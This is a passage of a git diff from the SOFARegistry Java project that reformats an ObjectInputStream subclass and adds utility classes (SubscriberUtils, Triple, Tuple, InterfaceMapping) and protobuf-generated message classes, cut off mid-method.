@return int serialization + */ + public int getSerialization() { + return this.serialization; + } + + /** + * Sets serialization. + * + * @param serial the serial + */ + public void setSerialization(int serial) { + this.serialization = serial; + } } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBoxInputStream.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBoxInputStream.java index 302cf80ef..ced94fe31 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBoxInputStream.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBoxInputStream.java @@ -23,33 +23,32 @@ /** * The type DataBox input stream. + * * @author zhuoyu.sjw * @version $Id : ServerDataBoxInputStream.java, v 0.1 2017-11-28 17:48 zhuoyu.sjw Exp $$ */ public class ServerDataBoxInputStream extends ObjectInputStream { - /** - * Instantiates a new DataBox input stream. - * - * @param in the in - * @throws IOException the io exception - */ - public ServerDataBoxInputStream(InputStream in) throws IOException { - super(in); - } + /** + * Instantiates a new DataBox input stream. + * + * @param in the in + * @throws IOException the io exception + */ + public ServerDataBoxInputStream(InputStream in) throws IOException { + super(in); + } - /** - * @see ObjectInputStream#resolveClass(ObjectStreamClass) - */ - @Override - protected Class resolveClass(ObjectStreamClass desc) throws IOException, - ClassNotFoundException { - String name = desc.getName(); - try { - ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); - return Class.forName(name, false, classLoader); - } catch (ClassNotFoundException ex) { - return super.resolveClass(desc); - } + /** @see ObjectInputStream#resolveClass(ObjectStreamClass) */ + @Override + protected Class resolveClass(ObjectStreamClass desc) + throws IOException, ClassNotFoundException { + String name = desc.getName(); + try { + ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); + return Class.forName(name, false, classLoader); + } catch (ClassNotFoundException ex) { + return super.resolveClass(desc); } + } } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/SubscriberUtils.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/SubscriberUtils.java new file mode 100644 index 000000000..fba1bb178 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/SubscriberUtils.java @@ -0,0 +1,111 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.net.InetSocketAddress; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import java.util.Map; + +public final class SubscriberUtils { + private static final Logger LOGGER = LoggerFactory.getLogger(SubscriberUtils.class); + + private SubscriberUtils() {} + + public static Map> groupBySourceAddress( + Collection subscribers) { + if (subscribers.isEmpty()) { + return Collections.emptyMap(); + } + Map> ret = Maps.newHashMap(); + subscribers.forEach( + s -> { + InetSocketAddress address = + new InetSocketAddress( + s.getSourceAddress().getIpAddress(), s.getSourceAddress().getPort()); + Map subs = ret.computeIfAbsent(address, k -> Maps.newHashMap()); + subs.put(s.getRegisterId(), s); + }); + return ret; + } + + public static Map> groupByScope(Collection subscribers) { + if (subscribers.isEmpty()) { + return Collections.emptyMap(); + } + Map> ret = Maps.newHashMap(); + for (Subscriber subscriber : subscribers) { + final ScopeEnum scopeEnum = subscriber.getScope(); + if (scopeEnum == null) { + LOGGER.warn("Nil ScopeEnum, {}", subscriber); + continue; + } + List subList = ret.computeIfAbsent(scopeEnum, k -> Lists.newArrayList()); + subList.add(subscriber); + } + return ret; + } + + public static ScopeEnum getAndAssertHasSameScope(Collection subscribers) { + ScopeEnum scope = subscribers.stream().findFirst().get().getScope(); + for (Subscriber subscriber : subscribers) { + if (scope != subscriber.getScope()) { + throw new RuntimeException( + String.format("conflict scope, first={}, one is {}", scope, subscriber)); + } + } + return scope; + } + + public static void assertClientVersion( + Collection subscribers, BaseInfo.ClientVersion clientVersion) { + for (Subscriber sub : subscribers) { + ParaCheckUtil.checkEquals(sub.getClientVersion(), clientVersion, "subscriber.clientVersion"); + } + } + + public static long getMaxPushedVersion(String dataCenter, Collection subscribers) { + long max = 0; + for (Subscriber sub : subscribers) { + long v = sub.getPushVersion(dataCenter); + if (max < v) { + max = v; + } + } + return max; + } + + public static long getMaxRegisterTimestamp(Collection subscribers) { + long max = 0; + for (Subscriber sub : subscribers) { + long v = sub.getRegisterTimestamp(); + if (max < v) { + max = v; + } + } + return max; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Triple.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Triple.java new file mode 100644 index 000000000..858bddb47 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Triple.java @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import java.util.Objects; + +/** + * @author chen.zhu + *

Jan 12, 2021 + */ +public final class Triple { + + private final F first; + + private final M middle; + + private final L last; + + public Triple(F first, M middle, L last) { + this.first = first; + this.middle = middle; + this.last = last; + } + + public static Triple from(F first, M middle, L last) { + return new Triple(first, middle, last); + } + + public F getFirst() { + return this.first; + } + + public L getLast() { + return this.last; + } + + public M getMiddle() { + return this.middle; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + Triple triple = (Triple) o; + return Objects.equals(first, triple.first) + && Objects.equals(middle, triple.middle) + && Objects.equals(last, triple.last); + } + + @Override + public int hashCode() { + return Objects.hash(first, middle, last); + } + + public int size() { + return 3; + } + + public String toString() { + return String.format( + "Triple[first=%s, middle=%s, last=%s]", this.first, this.middle, this.last); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Tuple.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Tuple.java new file mode 100644 index 000000000..281b2dcf2 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Tuple.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import java.util.Objects; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-15 10:28 yuzhi.lyz Exp $ + */ +public final class Tuple { + public final T1 o1; + public final T2 o2; + + public Tuple(T1 o1, T2 o2) { + this.o1 = o1; + this.o2 = o2; + } + + public static Tuple of(T1 t1, T2 t2) { + return new Tuple<>(t1, t2); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (!(o instanceof Tuple)) return false; + Tuple tuple = (Tuple) o; + return Objects.equals(o1, tuple.o1) && Objects.equals(o2, tuple.o2); + } + + public T1 getFirst() { + return o1; + } + + public T2 getSecond() { + return o2; + } + + @Override + public int hashCode() { + return Objects.hash(o1, o2); + } + + @Override + public String toString() { + return "Tuple{" + "o1=" + o1 + ", o2=" + o2 + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/appmeta/InterfaceMapping.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/appmeta/InterfaceMapping.java new file mode 100644 index 000000000..28dbe9bbe --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/appmeta/InterfaceMapping.java @@ -0,0 +1,60 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.appmeta; + +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.Set; + +public final class InterfaceMapping { + private final long nanosVersion; + private final Set apps; + + public InterfaceMapping(long nanosVersion) { + this.nanosVersion = nanosVersion; + this.apps = Collections.EMPTY_SET; + } + + public InterfaceMapping(long nanosVersion, String app) { + this.nanosVersion = nanosVersion; + this.apps = Sets.newHashSet(app); + } + + public InterfaceMapping(long nanosVersion, Set apps) { + this.nanosVersion = nanosVersion; + this.apps = Sets.newHashSet(apps); + } + + public InterfaceMapping(long nanosVersion, Set copyApp, String newApp) { + this.nanosVersion = nanosVersion; + this.apps = Sets.newHashSet(copyApp); + this.apps.add(newApp); + } + + public long getNanosVersion() { + return nanosVersion; + } + + public Set getApps() { + return Collections.unmodifiableSet(apps); + } + + @Override + public String toString() { + return "InterfaceMapping{" + "nanosVersion=" + nanosVersion + ", appSets=" + apps + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppDiscoveryMetaPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppDiscoveryMetaPb.java new file mode 100644 index 000000000..2db518337 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppDiscoveryMetaPb.java @@ -0,0 +1,247 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class AppDiscoveryMetaPb { + private AppDiscoveryMetaPb() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor internal_static_MetaRegister_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaRegister_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_MetaRegister_BaseParamsEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaRegister_BaseParamsEntry_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_MetaRegister_ServicesEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaRegister_ServicesEntry_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor internal_static_MetaService_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaService_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_MetaService_ParamsEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaService_ParamsEntry_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor internal_static_StringList_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_StringList_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor internal_static_AppList_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_AppList_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_ServiceAppMappingRequest_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ServiceAppMappingRequest_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_ServiceAppMappingResponse_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ServiceAppMappingResponse_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_ServiceAppMappingResponse_ServiceAppMappingEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ServiceAppMappingResponse_ServiceAppMappingEntry_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_GetRevisionsRequest_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_GetRevisionsRequest_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_GetRevisionsResponse_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_GetRevisionsResponse_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_GetRevisionsResponse_RevisionsEntry_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_GetRevisionsResponse_RevisionsEntry_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_MetaHeartbeatRequest_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaHeartbeatRequest_fieldAccessorTable; + static final com.google.protobuf.Descriptors.Descriptor + internal_static_MetaHeartbeatResponse_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_MetaHeartbeatResponse_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\030AppDiscoveryMetaPb.proto\"\255\002\n\014MetaRegis" + + "ter\022\023\n\013application\030\001 \001(\t\022\020\n\010revision\030\002 \001" + + "(\t\022\025\n\rclientVersion\030\003 \001(\t\0221\n\nbaseParams\030" + + "\004 \003(\0132\035.MetaRegister.BaseParamsEntry\022-\n\010" + + "services\030\005 \003(\0132\033.MetaRegister.ServicesEn" + + "try\032>\n\017BaseParamsEntry\022\013\n\003key\030\001 \001(\t\022\032\n\005v" + + "alue\030\002 \001(\0132\013.StringList:\0028\001\032=\n\rServicesE" + + "ntry\022\013\n\003key\030\001 \001(\t\022\033\n\005value\030\002 \001(\0132\014.MetaS" + + "ervice:\0028\001\"\177\n\013MetaService\022\n\n\002id\030\001 \001(\t\022(\n" + + "\006params\030\003 \003(\0132\030.MetaService.ParamsEntry\032" + + ":\n\013ParamsEntry\022\013\n\003key\030\001 \001(\t\022\032\n\005value\030\002 \001" + + "(\0132\013.StringList:\0028\001\"\034\n\nStringList\022\016\n\006val" + + "ues\030\001 \003(\t\"(\n\007AppList\022\017\n\007version\030\001 \001(\003\022\014\n" + + "\004apps\030\002 \003(\t\".\n\030ServiceAppMappingRequest\022" + + "\022\n\nserviceIds\030\001 \003(\t\"\322\001\n\031ServiceAppMappin" + + "gResponse\022L\n\021serviceAppMapping\030\001 \003(\01321.S" + + "erviceAppMappingResponse.ServiceAppMappi" + + "ngEntry\022\022\n\nstatusCode\030\002 \001(\005\022\017\n\007message\030\003" + + " \001(\t\032B\n\026ServiceAppMappingEntry\022\013\n\003key\030\001 " + + "\001(\t\022\027\n\005value\030\002 \001(\0132\010.AppList:\0028\001\"(\n\023GetR" + + "evisionsRequest\022\021\n\trevisions\030\001 \003(\t\"\265\001\n\024G" + + "etRevisionsResponse\0227\n\trevisions\030\001 \003(\0132$" + + ".GetRevisionsResponse.RevisionsEntry\022\022\n\n" + + "statusCode\030\002 \001(\005\022\017\n\007message\030\003 \001(\t\032?\n\016Rev" + + "isionsEntry\022\013\n\003key\030\001 \001(\t\022\034\n\005value\030\002 \001(\0132" + + "\r.MetaRegister:\0028\001\")\n\024MetaHeartbeatReque" + + "st\022\021\n\trevisions\030\001 \003(\t\"<\n\025MetaHeartbeatRe" + + "sponse\022\022\n\nstatusCode\030\001 \001(\005\022\017\n\007message\030\002 " + + "\001(\tB:\n/com.alipay.sofa.registry.common.m" + + "odel.client.pbP\001Z\005protob\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + internal_static_MetaRegister_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_MetaRegister_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaRegister_descriptor, + new java.lang.String[] { + "Application", "Revision", "ClientVersion", "BaseParams", "Services", + }); + internal_static_MetaRegister_BaseParamsEntry_descriptor = + internal_static_MetaRegister_descriptor.getNestedTypes().get(0); + internal_static_MetaRegister_BaseParamsEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaRegister_BaseParamsEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + internal_static_MetaRegister_ServicesEntry_descriptor = + internal_static_MetaRegister_descriptor.getNestedTypes().get(1); + internal_static_MetaRegister_ServicesEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaRegister_ServicesEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + internal_static_MetaService_descriptor = getDescriptor().getMessageTypes().get(1); + internal_static_MetaService_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaService_descriptor, + new java.lang.String[] { + "Id", "Params", + }); + internal_static_MetaService_ParamsEntry_descriptor = + internal_static_MetaService_descriptor.getNestedTypes().get(0); + internal_static_MetaService_ParamsEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaService_ParamsEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + internal_static_StringList_descriptor = getDescriptor().getMessageTypes().get(2); + internal_static_StringList_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_StringList_descriptor, + new java.lang.String[] { + "Values", + }); + internal_static_AppList_descriptor = getDescriptor().getMessageTypes().get(3); + internal_static_AppList_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_AppList_descriptor, + new java.lang.String[] { + "Version", "Apps", + }); + internal_static_ServiceAppMappingRequest_descriptor = getDescriptor().getMessageTypes().get(4); + internal_static_ServiceAppMappingRequest_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ServiceAppMappingRequest_descriptor, + new java.lang.String[] { + "ServiceIds", + }); + internal_static_ServiceAppMappingResponse_descriptor = getDescriptor().getMessageTypes().get(5); + internal_static_ServiceAppMappingResponse_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ServiceAppMappingResponse_descriptor, + new java.lang.String[] { + "ServiceAppMapping", "StatusCode", "Message", + }); + internal_static_ServiceAppMappingResponse_ServiceAppMappingEntry_descriptor = + internal_static_ServiceAppMappingResponse_descriptor.getNestedTypes().get(0); + internal_static_ServiceAppMappingResponse_ServiceAppMappingEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ServiceAppMappingResponse_ServiceAppMappingEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + internal_static_GetRevisionsRequest_descriptor = getDescriptor().getMessageTypes().get(6); + internal_static_GetRevisionsRequest_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_GetRevisionsRequest_descriptor, + new java.lang.String[] { + "Revisions", + }); + internal_static_GetRevisionsResponse_descriptor = getDescriptor().getMessageTypes().get(7); + internal_static_GetRevisionsResponse_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_GetRevisionsResponse_descriptor, + new java.lang.String[] { + "Revisions", "StatusCode", "Message", + }); + internal_static_GetRevisionsResponse_RevisionsEntry_descriptor = + internal_static_GetRevisionsResponse_descriptor.getNestedTypes().get(0); + internal_static_GetRevisionsResponse_RevisionsEntry_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_GetRevisionsResponse_RevisionsEntry_descriptor, + new java.lang.String[] { + "Key", "Value", + }); + internal_static_MetaHeartbeatRequest_descriptor = getDescriptor().getMessageTypes().get(8); + internal_static_MetaHeartbeatRequest_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaHeartbeatRequest_descriptor, + new java.lang.String[] { + "Revisions", + }); + internal_static_MetaHeartbeatResponse_descriptor = getDescriptor().getMessageTypes().get(9); + internal_static_MetaHeartbeatResponse_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_MetaHeartbeatResponse_descriptor, + new java.lang.String[] { + "StatusCode", "Message", + }); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppList.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppList.java new file mode 100644 index 000000000..0e397f696 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppList.java @@ -0,0 +1,602 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code AppList} */ +public final class AppList extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:AppList) + AppListOrBuilder { + private static final long serialVersionUID = 0L; + // Use AppList.newBuilder() to construct. + private AppList(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private AppList() { + version_ = 0L; + apps_ = com.google.protobuf.LazyStringArrayList.EMPTY; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private AppList( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 8: + { + version_ = input.readInt64(); + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000002) == 0x00000002)) { + apps_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000002; + } + apps_.add(s); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000002) == 0x00000002)) { + apps_ = apps_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_AppList_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_AppList_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.AppList.class, + com.alipay.sofa.registry.common.model.client.pb.AppList.Builder.class); + } + + private int bitField0_; + public static final int VERSION_FIELD_NUMBER = 1; + private long version_; + /** int64 version = 1; */ + public long getVersion() { + return version_; + } + + public static final int APPS_FIELD_NUMBER = 2; + private com.google.protobuf.LazyStringList apps_; + /** repeated string apps = 2; */ + public com.google.protobuf.ProtocolStringList getAppsList() { + return apps_; + } + /** repeated string apps = 2; */ + public int getAppsCount() { + return apps_.size(); + } + /** repeated string apps = 2; */ + public java.lang.String getApps(int index) { + return apps_.get(index); + } + /** repeated string apps = 2; */ + public com.google.protobuf.ByteString getAppsBytes(int index) { + return apps_.getByteString(index); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (version_ != 0L) { + output.writeInt64(1, version_); + } + for (int i = 0; i < apps_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, apps_.getRaw(i)); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (version_ != 0L) { + size += com.google.protobuf.CodedOutputStream.computeInt64Size(1, version_); + } + { + int dataSize = 0; + for (int i = 0; i < apps_.size(); i++) { + dataSize += computeStringSizeNoTag(apps_.getRaw(i)); + } + size += dataSize; + size += 1 * getAppsList().size(); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.AppList)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.AppList other = + (com.alipay.sofa.registry.common.model.client.pb.AppList) obj; + + boolean result = true; + result = result && (getVersion() == other.getVersion()); + result = result && getAppsList().equals(other.getAppsList()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + VERSION_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getVersion()); + if (getAppsCount() > 0) { + hash = (37 * hash) + APPS_FIELD_NUMBER; + hash = (53 * hash) + getAppsList().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static 